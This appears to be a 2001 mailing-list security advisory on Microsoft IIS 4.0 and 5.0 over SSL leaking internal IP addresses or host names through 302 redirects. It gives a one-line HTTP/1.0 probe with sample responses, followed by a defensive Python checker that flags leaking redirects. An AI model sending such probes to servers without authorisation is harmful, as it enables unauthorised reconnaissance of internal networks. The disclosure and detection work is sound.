GGS-AU / e-Synergies Security Advisory
August 8, 2001

Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0

Synopsis:
e-Synergies has discovered and researched a remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as the server's internal IP address or internal host name.

Affected Versions:
Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL

Description:
By connecting manually to port TCP/443 (SSL) using Perl (SSLeay) or any other tool, a remote user can retrieve the server's internal IP address or reveal the machine's network node hostname.

Exploit:
1- Browse the web site using a normal SSL browser and find any directory, e.g.: https://www.target.com/images/icon.gif
2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com:
   GET /images HTTP/1.0
3- The result should look like this:
   HTTP/1.1 302 Object Moved
   Location: https://192.168.1.10/images/
   Server: Microsoft-IIS/4.0
   Content-Type: text/html
   Content-Length: xxx
or
   HTTP/1.1 302 Object Moved
   Location: https://netbiosname/images/
   Server: Microsoft-IIS/4.0
   Content-Type: text/html
   Content-Length: xxx

Remarks:
Using HTTP/1.1 instead of HTTP/1.0 will not give the same result.

Credits:
Marek Roy
Senior IT Security Consultant

Please send suggestions, updates, and comments to:
GGS-AU / e-synergies, Sydney, Australia
Level 9, 65 York Street
Sydney NSW 2001, Australia
Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries@ggs-au.com
http://www.ggs-au.com
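An administrator checking their own server against this advisory needs to decide whether a captured redirect is of the leaking kind. The Python below is an added example, not part of the advisory or of any e-Synergies tool; it parses raw HTTP responses and flags a 3xx whose Location host is a private (RFC 1918 / loopback) address or a bare single-label node name, which are the two shapes printed above. The three sample responses are constructed here (address, NetBIOS name and Content-Length are illustrative), so the script runs offline; the same function can be fed responses captured from a real test.

```python
from __future__ import annotations

import ipaddress
import re

# Constructed sample responses, modelled on the two response shapes the advisory
# prints plus the shape a correctly configured server should return. The
# address, the host name and the length are illustrative values.
SAMPLE_IP_LEAK = (
    b"HTTP/1.1 302 Object Moved\r\n"
    b"Location: https://192.168.1.10/images/\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
SAMPLE_NAME_LEAK = (
    b"HTTP/1.1 302 Object Moved\r\n"
    b"Location: https://netbiosname/images/\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
SAMPLE_OK = (
    b"HTTP/1.1 302 Object Moved\r\n"
    b"Location: https://www.target.com/images/\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# scheme "://" authority  -- captures the authority of an absolute URL
_URL_HOST = re.compile(r"^[a-z][a-z0-9+.\-]*://([^/?#]+)", re.IGNORECASE)


def parse_response_head(raw: bytes) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP response into its status line and a lower-cased header map."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def host_of(location: str) -> str | None:
    """Return the host part of an absolute URL without port; None for a relative URL."""
    m = _URL_HOST.match(location)
    if not m:
        return None
    authority = m.group(1)
    if "@" in authority:  # drop any userinfo
        authority = authority.rsplit("@", 1)[1]
    if authority.startswith("["):  # bracketed IPv6 literal
        end = authority.find("]")
        return authority[1:end] if end > 0 else None
    return authority.rsplit(":", 1)[0] if ":" in authority else authority


def classify_host(host: str) -> str:
    """Classify a redirect target: private-ip, public-ip, bare-hostname or fqdn."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "fqdn" if "." in host else "bare-hostname"
    return "private-ip" if addr.is_private else "public-ip"


def redirect_leaks_internal_info(raw: bytes) -> bool:
    """True when a 3xx response's Location exposes a private address or a bare node name."""
    status, headers = parse_response_head(raw)
    parts = status.split()
    if len(parts) < 2 or not parts[1].startswith("3"):
        return False
    location = headers.get("location")
    if location is None:
        return False
    host = host_of(location)
    if host is None:  # relative redirect: nothing about the host is revealed
        return False
    return classify_host(host) in ("private-ip", "bare-hostname")


if __name__ == "__main__":
    for label, sample in (("ip", SAMPLE_IP_LEAK), ("name", SAMPLE_NAME_LEAK), ("ok", SAMPLE_OK)):
        print(label, "LEAK" if redirect_leaks_internal_info(sample) else "clean")
```

A public IP in the Location is reported as "public-ip" rather than a leak, since it reveals nothing an attacker could not learn by resolving the site's name; the advisory's remark that an HTTP/1.1 request does not trigger the behaviour means a test harness feeding this function must send the HTTP/1.0 form shown above.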
This archive was generated by hypermail 2b30 : Wed Aug 08 2001 - 08:18:33 PDT